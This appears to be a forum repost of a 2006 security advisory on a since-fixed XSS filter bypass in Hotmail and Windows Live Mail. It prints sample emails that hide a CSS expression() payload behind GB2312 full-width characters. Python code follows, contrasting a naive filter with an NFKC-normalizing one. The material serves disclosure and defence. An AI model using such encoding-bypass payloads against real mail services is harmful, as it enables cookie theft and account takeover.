alexcargo Posted November 7, 2006

Introduction:
Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft.

Details:
Hotmail's filter identifies "expression()" syntax in a CSS attribute. According to Hasegawa Yosuke's post (http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings (e.g. GB2312), we can substitute some special double-byte chars for the corresponding chars in "expression()". In this case, we can create a malformed CSS attribute, which Hotmail's filter fails to inspect and filter for the "expression()" syntax.

An example:

Hotmail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example

<img id='sss'><input id='ttt' value="javascript:alert('xss')"><span style="font-family:[ascii 163][ascii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span>.
--------------------------------------------------

Windows Live Mail
--------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example

<img id='sss'><input id='ttt' value="javascript:alert('xss')"><span style="font-family:[ascii 163][ascii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>.
--------------------------------------------------

The injected code inside the CSS attribute is responsible for:
- Getting cookies.
- Potential web-based e-mail worm.

Vendor status:
Microsoft was notified on Sep 25th, 2006. The bug is now fixed.

Original advisory:
http://applesoup.googlepages.com/hotmail_xss.txt
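The bypass above works because the filter looks for the ASCII token "expression(" while the message carries GB2312 full-width look-alikes: byte pair 0xA3 0xC5 ([ascii 163][ascii 197]) decodes to U+FF25 FULLWIDTH LATIN CAPITAL LETTER E and 0xA3 0xA8 ([ascii 163][ascii 168]) decodes to U+FF08 FULLWIDTH LEFT PARENTHESIS, which the browser of the day treated as plain "E" and "(" inside CSS. The following is an added example, not code from the advisory or from Microsoft's filter: it reconstructs the style attribute as raw GB2312 bytes, shows that a naive regex filter (my assumption of how such a filter is written) misses it, and shows a hardened variant that folds compatibility characters with NFKC before matching. The byte string is constructed here from the advisory's [ascii ...] notation.

```python
import re
import unicodedata

# Constructed sample: the style attribute from the Hotmail example, as raw GB2312 bytes.
# 0xA3 0xC5 is full-width 'E' (U+FF25); 0xA3 0xA8 is full-width '(' (U+FF08).
STYLE_GB2312 = (
    b"font-family:\xa3\xc5xpression\xa3\xa8"
    b"document.all.sss.src=document.all.ttt.value)"
)

# A plain ASCII payload, for comparison: any filter should catch this one.
STYLE_ASCII = b"font-family:expression(document.all.sss.src=document.all.ttt.value)"

# The kind of check the advisory describes: look for the literal token "expression(".
EXPRESSION_RE = re.compile(r"expression\s*\(", re.IGNORECASE)


def decode_style(style_bytes: bytes, charset: str = "gb2312") -> str:
    """Decode the attribute with the charset declared in the Content-Type header."""
    return style_bytes.decode(charset, errors="replace")


def naive_filter_blocks(style_bytes: bytes, charset: str = "gb2312") -> bool:
    """Assumed naive filter: decode, then match the ASCII token only.

    Returns True when the payload is blocked. Full-width 'E' and '(' are
    different code points, so the regex never sees "expression(" and the
    GB2312 payload slips through.
    """
    return EXPRESSION_RE.search(decode_style(style_bytes, charset)) is not None


def hardened_filter_blocks(style_bytes: bytes, charset: str = "gb2312") -> bool:
    """Hardened variant: NFKC-fold compatibility characters before matching.

    NFKC maps U+FF25 -> 'E' and U+FF08 -> '(', so the folded text contains
    the literal token and the regex matches.
    """
    folded = unicodedata.normalize("NFKC", decode_style(style_bytes, charset))
    return EXPRESSION_RE.search(folded) is not None


def folded_style(style_bytes: bytes, charset: str = "gb2312") -> str:
    """Return the NFKC-folded text, useful for seeing what the browser effectively ran."""
    return unicodedata.normalize("NFKC", decode_style(style_bytes, charset))


if __name__ == "__main__":
    for label, payload in (("ASCII", STYLE_ASCII), ("GB2312", STYLE_GB2312)):
        print(f"{label:7} decoded : {decode_style(payload)!r}")
        print(f"{label:7} naive   : {'blocked' if naive_filter_blocks(payload) else 'PASSED'}")
        print(f"{label:7} hardened: {'blocked' if hardened_filter_blocks(payload) else 'PASSED'}")
```

Two caveats worth keeping in mind. First, the filter must decode with the same charset the recipient's browser will use; if the mail declares GB2312 but the filter inspects raw bytes or assumes Latin-1, the double-byte pair never becomes a full-width letter and no amount of normalization helps. Second, NFKC folding only closes the look-alike route shown here; the durable fix for a web-mail client is to drop or rewrite any CSS the filter cannot fully parse, rather than to blacklist one token.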